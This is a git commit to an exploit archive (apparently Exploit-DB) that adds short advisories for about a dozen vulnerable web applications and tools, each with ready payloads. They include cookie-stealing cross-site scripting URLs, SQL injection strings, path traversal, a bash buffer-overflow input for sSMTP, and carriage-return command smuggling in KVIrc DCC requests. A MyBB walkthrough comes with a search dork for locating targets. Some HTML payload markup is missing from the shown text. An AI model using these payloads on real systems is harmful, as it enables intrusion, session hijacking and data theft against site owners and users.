From 059c038e05f93dbbcec987b822f4c8bc222fca39 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 22 Aug 2014 04:39:33 +0000 Subject: [PATCH] Updated 08_22_2014 --- files.csv | 13 ++++ platforms/asp/webapps/34376.txt | 7 ++ platforms/asp/webapps/34380.txt | 9 +++ platforms/jsp/webapps/34384.txt | 11 +++ platforms/linux/dos/34375.txt | 9 +++ platforms/linux/remote/34385.txt | 10 +++ platforms/multiple/remote/34372.txt | 9 +++ platforms/php/webapps/34373.txt | 17 +++++ platforms/php/webapps/34374.txt | 9 +++ platforms/php/webapps/34377.txt | 9 +++ platforms/php/webapps/34378.txt | 9 +++ platforms/php/webapps/34379.html | 109 ++++++++++++++++++++++++++++ platforms/php/webapps/34381.txt | 41 +++++++++++ platforms/php/webapps/34383.txt | 9 +++ 14 files changed, 271 insertions(+) create mode 100755 platforms/asp/webapps/34376.txt create mode 100755 platforms/asp/webapps/34380.txt create mode 100755 platforms/jsp/webapps/34384.txt create mode 100755 platforms/linux/dos/34375.txt create mode 100755 platforms/linux/remote/34385.txt create mode 100755 platforms/multiple/remote/34372.txt create mode 100755 platforms/php/webapps/34373.txt create mode 100755 platforms/php/webapps/34374.txt create mode 100755 platforms/php/webapps/34377.txt create mode 100755 platforms/php/webapps/34378.txt create mode 100755 platforms/php/webapps/34379.html create mode 100755 platforms/php/webapps/34381.txt create mode 100755 platforms/php/webapps/34383.txt diff --git a/files.csv b/files.csv index 073aadf3d..8380b5056 100755 --- a/files.csv +++ b/files.csv @@ -30958,3 +30958,16 @@ id,file,description,date,author,platform,type,port 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 +34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 +34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0 +34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0 +34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 'standardize()' Buffer Overflow Vulnerability",2010-07-26,"Brendan Boerner",linux,dos,0 +34376,platforms/asp/webapps/34376.txt,"e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 +34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0 +34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI Cross Site Scripting Vulnerability",2009-12-04,anonymous,php,webapps,0 +34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 +34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 'searchadvance.asp' Cross Site Scripting Vulnerability",2009-12-22,"Andrea Bocchetti",asp,webapps,0 +34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0 +34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0 +34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0 +34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0 diff --git a/platforms/asp/webapps/34376.txt b/platforms/asp/webapps/34376.txt new file mode 100755 index 000000000..eaa427105 --- /dev/null +++ b/platforms/asp/webapps/34376.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/41970/info + +e-Courier CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +https://www.example.com/home/index.asp?UserGUID="> \ No newline at end of file diff --git a/platforms/asp/webapps/34380.txt b/platforms/asp/webapps/34380.txt new file mode 100755 index 000000000..95c4c2827 --- /dev/null +++ b/platforms/asp/webapps/34380.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41995/info + +Active Business Directory is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Active Business Directory 2 is vulnerable; other versions may also be affected. + +http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss \ No newline at end of file diff --git a/platforms/jsp/webapps/34384.txt b/platforms/jsp/webapps/34384.txt new file mode 100755 index 000000000..86163b9ad --- /dev/null +++ b/platforms/jsp/webapps/34384.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/42025/info + +Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, and execute arbitrary client-side scripts in the context of the browser. + +Jira 4.01 is vulnerable; other versions may also be affected. + +http://www.example.com/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html, +http://www.example.com/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript:alert(0)';foo=' + diff --git a/platforms/linux/dos/34375.txt b/platforms/linux/dos/34375.txt new file mode 100755 index 000000000..31e8e09fa --- /dev/null +++ b/platforms/linux/dos/34375.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41965/info + +sSMTP is prone to a remote buffer-overflow vulnerability. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +sSMTP 2.6.2 is vulnerable; other versions may also be affected. + +echo -n . ; for i in {1..2050} ; do echo -n $i ; done \ No newline at end of file diff --git a/platforms/linux/remote/34385.txt b/platforms/linux/remote/34385.txt new file mode 100755 index 000000000..3c1aea138 --- /dev/null +++ b/platforms/linux/remote/34385.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/42026/info + +KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application. + +KVIrc 4.0.0 is vulnerable; other versions may also be affected. + +/ctcp nickname DCC GET\rQUIT\r +/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r \ No newline at end of file diff --git a/platforms/multiple/remote/34372.txt b/platforms/multiple/remote/34372.txt new file mode 100755 index 000000000..e0e3bc05c --- /dev/null +++ b/platforms/multiple/remote/34372.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41929/info + +Twonky Server is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Versions prior to Twonky Server 4.4.18, 5.0.66, and 5.1 are vulnerable. + +http://www.example.com/twonky:9000/fake_config_page \ No newline at end of file diff --git a/platforms/php/webapps/34373.txt b/platforms/php/webapps/34373.txt new file mode 100755 index 000000000..756063f0f --- /dev/null +++ b/platforms/php/webapps/34373.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/41949/info + +MC Content Manager is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Cross site scripting: + +1) http://www.example.com/article.php?root=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + +2) http://www.example.com/static.php?page=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + +3) http://www.example.com/cms/%3Cbody%20onload=alert(document.cookie)%3E/ + +SQL Injection: + +1) http://www.example.com/cms/ua%20where%201=1--%20/ \ No newline at end of file diff --git a/platforms/php/webapps/34374.txt b/platforms/php/webapps/34374.txt new file mode 100755 index 000000000..57e03a4a4 --- /dev/null +++ b/platforms/php/webapps/34374.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41961/info + +Joomla! FreiChat component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Versions prior to FreiChat 2.1.2 are vulnerable. + + diff --git a/platforms/php/webapps/34377.txt b/platforms/php/webapps/34377.txt new file mode 100755 index 000000000..64fa3c58e --- /dev/null +++ b/platforms/php/webapps/34377.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41973/info + +Portili Personal and Team Wiki are prone to multiple security vulnerabilities. These vulnerabilities include a cross-site scripting vulnerability, an arbitrary-file-upload vulnerability, and multiple information-disclosure vulnerabilities. + +Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, upload arbitrary files to the affected computer, and execute arbitrary script code in the context of the browser. + +Personal Wiki 1.14 and Team Wiki 1.14 are vulnerable; other versions may also be affected. + +http://www.example.com/ajaxfilemanager/ajaxfilemanager.php?path=../uploads/&view=1 \ No newline at end of file diff --git a/platforms/php/webapps/34378.txt b/platforms/php/webapps/34378.txt new file mode 100755 index 000000000..50987e75c --- /dev/null +++ b/platforms/php/webapps/34378.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41986/info + +DPI is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +DPI version 1.1f is vulnerable; other versions may also be affected. + +http://www.example.com/path/images.php?date=%3Cscript%3Ealert(XSS)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34379.html b/platforms/php/webapps/34379.html new file mode 100755 index 000000000..275c0ec27 --- /dev/null +++ b/platforms/php/webapps/34379.html @@ -0,0 +1,109 @@ +source: http://www.securityfocus.com/bid/41989/info + +SyndeoCMS is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +SyndeoCMS 2.9.0 is vulnerable; prior versions may also be affected. + +
+ + + + + + + + +' /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +
+ + + + +'> + + + + + + + + + + + + + + +' > + + +
+ + + diff --git a/platforms/php/webapps/34381.txt b/platforms/php/webapps/34381.txt new file mode 100755 index 000000000..c0d6c4c02 --- /dev/null +++ b/platforms/php/webapps/34381.txt @@ -0,0 +1,41 @@ +# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection +# Google Dork: intext:"Powered By MyBB" +# Date: 15.08.2014 +# Author: DemoLisH +# Vendor Homepage: http://www.mybb.com/ +# Software Link: http://www.mybb.com/downloads +# Version: 1.8 - Beta 3 +# Contact: onur@b3yaz.org +*************************************************** +a) Cross Site Scripting in Installation Wizard ( Board Configuration ) +Fill -Forum Name, Website Name, Website URL- with your code, for example - ">localhost/install/index.php +Now let's finish setup and go to the homepage. + + +b) SQL Injection in Private Messages ( User CP ) +Go to -> Inbox, for example:localhost/private.php +Search at the following code Keywords: